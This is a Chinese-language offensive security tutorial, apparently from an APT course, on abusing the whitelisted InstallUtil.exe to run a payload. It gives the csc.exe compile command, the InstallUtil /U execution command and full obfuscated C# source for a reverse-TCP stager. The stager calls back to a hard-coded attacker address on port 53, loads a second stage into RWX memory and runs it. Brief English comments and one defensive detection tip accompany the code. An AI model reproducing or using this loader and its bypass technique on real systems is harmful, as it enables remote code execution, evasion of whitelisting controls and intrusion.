第七十二課:基于白名單Installutil.exe執(zhí)行payload第二季
專注APT攻擊與防御
https://micropoor.blogspot.com/

Installutil簡介:
Installer工具(InstallUtil.exe)是一個命令行實用程序,允許您通過執(zhí)行指定程序集中的安裝程序組件來安裝和卸載服務(wù)器資源。此工具與System.Configuration.Install命名空間中的類一起使用。
具體參考:Windows Installer部署
https://docs.microsoft.com/zh-cn/previous-versions/2kt85ked(v=vs.120)

說明:Installutil.exe所在路徑?jīng)]有被系統(tǒng)添加到PATH環(huán)境變量中,因此直接輸入Installutil命令無法被識別,下面均使用完整路徑調(diào)用。

基于白名單installutil.exe配置payload:

Windows 7 默認(rèn)位置:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe(32位);64位版本位於 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe,下面的x64 payload使用的是後者。
攻擊機(jī):192.168.1.4 Debian
靶機(jī): 192.168.1.3 Windows 7

配置攻擊機(jī)msf(監(jiān)聽 192.168.1.4:53,須與附錄代碼 LCIUtRN 中硬編碼的回連地址一致):
靶機(jī)執(zhí)行:

靶機(jī)編譯:

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /r:System.IO.Compression.dll /target:library /out:Micropoor.exe /keyfile:C:\Users\John\Desktop\installutil.snk /unsafe C:\Users\John\Desktop\installutil.cs
payload:Micropoor.exe(雖以 .exe 為擴(kuò)展名,但由上面的 /target:library 編譯為類庫,由 InstallUtil 加載而非直接運行)
靶機(jī)執(zhí)行(/U 表示走卸載流程,對應(yīng)附錄代碼中重寫的 Uninstall 方法;/logfile= 與 /LogToConsole=false 用於關(guān)閉安裝日誌輸出):

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U Micropoor.exe
附錄:Micropoor.cs(與上面編譯命令中引用的 installutil.cs 為同一源文件)
注:x64 payload(須與上面 Framework64 目錄下的 csc.exe / InstallUtil.exe 搭配使用;stager 回連地址硬編碼為 192.168.1.4:53,見 LCIUtRN)。防御視角:InstallUtil.exe 是系統(tǒng)自帶的白名單程序,可通過監(jiān)控其加載非系統(tǒng)目錄下的程序集、帶 /U 參數(shù)的命令行以及隨後的出站網(wǎng)絡(luò)連接來發(fā)現(xiàn)此類利用。

1 using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.Configuration.Install; using System.Windows.Forms;
public class GQLBigHgUniLuVx {
    // Decoy entry point. The build command on this page compiles the file with
    // /target:library and the assembly is then driven by InstallUtil /U, so this
    // Main is not what starts the stager; if it were ever invoked as an entry
    // point it would only keep showing a message box and waiting for a line of
    // console input.
    public static void Main()
    {
        for (;;)
        {
            MessageBox.Show("doge");
            Console.ReadLine();
        }
    }
}
9
[System.ComponentModel.RunInstallerAttribute(true)]
public class esxWUYUTWShqW : System.Configuration.Install.Installer
{
    // Installer component that InstallUtil discovers in this assembly. The
    // invocation on this page uses the /U switch, so it is this Uninstall
    // override — not Install or Main — that executes and hands control to the
    // stager. base.Uninstall is not called and the saved-state dictionary is
    // never read.
    public override void Uninstall(System.Collections.IDictionary zWrdFAUHmunnu)
    {
        System.Action launchStager = jkmhGrfzsKQeCG.LCIUtRN;
        launchStager();
    }
}
18
public class jkmhGrfzsKQeCG
{
    // Reverse-TCP stager. LCIUtRN connects back to 192.168.1.4:53, pulls a
    // length-prefixed second stage over the socket, copies it into an
    // executable heap allocation and runs it on a new thread. Everything here
    // is raw Win32 via P/Invoke into kernel32; no other native library is used.

    // VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect). The return
    // value and lpAddress are declared as UInt32 rather than IntPtr, so only the
    // low 32 bits of the returned pointer survive marshaling. The page labels
    // this an x64 build — NOTE(review): that only works while the allocation
    // happens to land below 4 GB; an IntPtr signature would be the robust form.
    [DllImport("kernel32")] private static extern UInt32 VirtualAlloc(UInt32 YUtHhF, UInt32 VenifEUR, UInt32 NIHbxnOmrgiBGL, UInt32 KIheHEUxhAfOI);
    // CreateThread(lpThreadAttributes, dwStackSize, lpStartAddress, lpParameter,
    // dwCreationFlags, lpThreadId). lpStartAddress is likewise only a UInt32.
    [DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 GDmElasSZbx, UInt32 rGECFEZG, UInt32 UyBSrAIp, IntPtr sPEeJlufmodo, UInt32 jmzHRQU, ref UInt32 SnpQPGMvDbMOGmn);
    // WaitForSingleObject(hHandle, dwMilliseconds).
    [DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr pRIwbzTTS, UInt32 eRLAWWYQnq);

    // Downloads the second stage from ZwznjBJY:KsMEeo over TCP.
    // Wire format as read here: a 4-byte length in native byte order
    // (little-endian on x86/x64), then that many bytes of stage. Returns a
    // buffer of length+5 bytes laid out as
    //   [0]    0xBF
    //   [1..4] the low 32 bits of the connected socket handle
    //   [5..]  the stage exactly as received
    // 0xBF followed by a 4-byte immediate is x86 `mov edi, imm32`, i.e. the
    // stage is presumably entered with its socket in edi — verify against the
    // server side. Returns null only when the connect fails. The socket is
    // never closed here, presumably so the stage can keep using the handle.
    static byte[] ErlgHH(string ZwznjBJY, int KsMEeo) {
        IPEndPoint qAmSXHOKCbGlysd = new IPEndPoint(IPAddress.Parse(ZwznjBJY), KsMEeo);
        Socket XXxIoIXNCle = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
        try { XXxIoIXNCle.Connect(qAmSXHOKCbGlysd); }
        catch { return null;}
        // NOTE(review): a single Receive is assumed to deliver all 4 header
        // bytes; a short read leaves part of the buffer zero and the decoded
        // length is then wrong. The length is taken from the peer unchecked: a
        // negative value makes the array allocation below throw.
        byte[] UmquAHRnhhpuE = new byte[4];
        XXxIoIXNCle.Receive(UmquAHRnhhpuE, 4, 0);
        int kFVRSNnpj = BitConverter.ToInt32(UmquAHRnhhpuE, 0);
        byte[] qaYyFq = new byte[kFVRSNnpj + 5];
        int SRCDELibA = 0;
        // Receive the stage into the buffer starting at offset 5, in chunks of
        // at most 4096 bytes. If the peer closes early Receive returns 0, the
        // counter stops advancing and this loop never exits.
        while (SRCDELibA < kFVRSNnpj)
        { SRCDELibA += XXxIoIXNCle.Receive(qaYyFq, SRCDELibA + 5, (kFVRSNnpj - SRCDELibA) < 4096 ? (kFVRSNnpj - SRCDELibA) : 4096, 0);}
        // Patch the socket handle (cast to int, so truncated to 32 bits) into
        // bytes 1..4 and the 0xBF opcode into byte 0.
        byte[] TvvzOgPLqwcFFv = BitConverter.GetBytes((int)XXxIoIXNCle.Handle);
        Array.Copy(TvvzOgPLqwcFFv, 0, qaYyFq, 1, 4); qaYyFq[0] = 0xBF;
        return qaYyFq;}

    // Runs HEHUjJhkrNS as native code: commits an RWX region sized to the
    // buffer (0x1000 = MEM_COMMIT, 0x40 = PAGE_EXECUTE_READWRITE in the Win32
    // API), copies the bytes in, starts a thread at the region's base and
    // blocks on it forever (0xFFFFFFFF = INFINITE). A null input is silently
    // ignored, which is what a failed connect in ErlgHH produces.
    static void cmMtjerv(byte[] HEHUjJhkrNS) {
        if (HEHUjJhkrNS != null) {
            // NOTE(review): the VirtualAlloc result is not checked; on failure
            // it is 0 and the Marshal.Copy below has no valid destination.
            UInt32 WcpKfU = VirtualAlloc(0, (UInt32)HEHUjJhkrNS.Length, 0x1000, 0x40);
            Marshal.Copy(HEHUjJhkrNS, 0, (IntPtr)(WcpKfU), HEHUjJhkrNS.Length);
            IntPtr UhxtIFnlOQatrk = IntPtr.Zero;
            UInt32 wdjYKFDCCf = 0;
            IntPtr XVYcQxpp = IntPtr.Zero;
            // No parameter is passed to the thread; the stage presumably finds
            // its socket through the prefix patched in by ErlgHH. The thread
            // handle is never closed.
            UhxtIFnlOQatrk = CreateThread(0, 0, WcpKfU, XVYcQxpp, 0, ref wdjYKFDCCf);
            // Because the wait is INFINITE, the caller (the Uninstall override
            // on this page) does not return while the stage is running.
            WaitForSingleObject(UhxtIFnlOQatrk, 0xFFFFFFFF); }}

    // Entry point called from the Installer's Uninstall override. The C2
    // address and port are hard-coded here: 192.168.1.4 is the attacker host
    // on this page; port 53 was presumably chosen to resemble DNS traffic.
    public static void LCIUtRN() {
        byte[] IBtCWU = null; IBtCWU = ErlgHH("192.168.1.4", 53);
        cmMtjerv(IBtCWU);
    } }
Micropoor